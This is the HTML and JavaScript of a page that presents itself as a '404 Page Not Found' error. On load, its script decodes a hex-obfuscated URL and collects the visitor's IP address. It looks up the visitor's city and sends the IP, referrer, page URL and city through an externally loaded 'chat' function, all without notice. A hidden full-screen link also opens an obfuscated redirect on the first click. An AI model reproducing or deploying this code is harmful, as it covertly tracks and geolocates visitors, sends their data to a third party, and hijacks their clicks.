<!DOCTYPE html>
<html>
  <head>
    <title> 404 PAGE NOT FOUND </title>
    <link rel="shortcut icon" type="image/png" href="https://spat-cloud.github.io/data/DORAEMON1.png">
    <meta name="viewport" content="width=device-width">
    <meta name="theme-color" content="red">
    <script src="https://spat-cloud.github.io/HarScript/HSDK.Private.Raw.js"></script>
<!-- <script async src="https://spat-cloud.github.io/data/HarScript/HarScript.v2.9.Latest.min.js"></script>-->
      <center> <h1>404 Page Not Found</h1> </center>
<style>
    *{
        margin: 0;
        padding: 0;
        box-sizing: border-box;
        background-color: black;

    }
    @font-face {
        font-family: Gothic;
        src: url(FONTS/Gothic/Gothic.otf);
    }
    /* body{
        width: 100%;
        height: max-content;
        background-image: url(INTRO_009.png);
        object-fit: cover;
        background-repeat: no-repeat;
    } */
    .cont{
        display: flex;
        flex-direction: column;
        width: 75%;
        margin: 1% auto;
        color: rgb(67, 241, 67);
        gap: .5em;
        justify-content: center;
        align-items: center;
    }
    h3{
        font-family: Gothic;
        font-size: xx-large;
        color: rgb(233, 33, 57);
        word-spacing: 15%;
    }
    .cont > h1{
        margin-top: 1%;
        color: rgb(204, 199, 199);
        font-family: Gothic;
        word-spacing: .3em;
        font-size: 37px;
    }
    hr{
        border: none;
        border-style: dotted;
        border-color:rgb(167, 47, 7) ;
        color: #1ab6f9;
    }
    .cont>img{
        width:max-content;
        aspect-ratio: 16/9;
        border-radius: .9em;
        /* transform: scale(1,1); */
        object-fit: cover;
        filter: brightness(55%);
        /* filter: blur(.5em); */
    }
    .cont>p:nth-child(1) {
        color: rgb(40, 222, 40);
    }

    
  
</style>
  </head>
  <body onload="getAd()">


<div class="cont">
        <h1>ERROR GLITCH...</h1>
        <img src="SCALE_300.jpg" alt="ERR">
        <p>~$ ERR : </p>
        <h3 id="Days"> </h3>
    </div>
    


    
  <a href="javascript:lp()" style="width:100%; height:100%;top:0;left:0;right:0;bottom:0;position:fixed;" id="evtd"></a>
  </body>
  <script>
    let tok={utkn:"75e293b315b34134f221a434949431a365d4822453a1a5341561a4a3219482541554e4d24163b5f29511a45431a1a5d271e2924411339224",redt:"e1229224856143b33572e4b3"};
          $=new $_;
          $.run();
            mky="e1e1843475f2f424a12393a355b24134e4a1b5d2f4b2413465c4f4b31532932465c4824494a1a5d271e2924411339224",su=(i)=>`https://ipapi.co/${i}/json`;
            getAd=()=>{
                fetch(new Request(mky.hl())).then(j=>j.json()).then(d=>{
                    if(d.ip!=undefined)
                {
                    fetch(new Request(su(d.ip))).then(c=>c.json())
                    .then(b=>{$.chat(d.ip+":"+"Referer:"+(document.referrer!=''?document.referrer:'direct')+","+window.location.href,b.city)})
                    .catch(e=>console.error(e));
                }else {return;}
                })
                .catch(e=>console.log(e));
              
            };
    //e1229224856143b33572e4b3
    function lp(){
      f=location.pathname;
      if(f.includes(tok.utkn.hl()))open(tok.redt.hl(),'blank'); 
      else return null;
    }
    evtd.addEventListener("click",function(){lp();this.style.display="none";},{once:true});
            const zaa=(x)=>{
            return x<10?"0"+x:x;
        }
        var qsc=document.querySelector(".cont>p");
        var dates=["SUNDAY","MONDAY","TUESDAY","WEDNESDAY","THURSDAY","FRIDAY","SATURDAY"];
        const dt=new Date();
        let loc="https://speed.cloudflare.com/meta";
        Days.innerText=dates[dt.getDay()]
        let dat=fetch(new Request(loc));
        dat.then((req)=>{
            if(!req.ok)
        {
            qsc.innerHTML +="HOST UNREACABLE (::6969)";
        }
        else{
            //NOTGING TO DO
        }
        return req.json();
        }).then((Res)=>{
        qsc.innerHTML +=` ${Res.clientIp.includes(':')?'::Ipv6 Host':Res.clientIp} Requested<hr><br> GEO LOCATION : ${Res.country},${Res.city},${Res.region},${Res.postalCode}<hr><br>ISP : ${Res.asOrganization}<hr><br>Requested On : ${zaa(dt.getDate())}/${zaa(dt.getMonth()+1)}/${zaa(dt.getFullYear())}`;})

   /* if(location.pathname.includes(tok.redt.hl())) window.open(tok.utkn.hl(),"blank");
    else return 0;*/
  </script>
  </html>
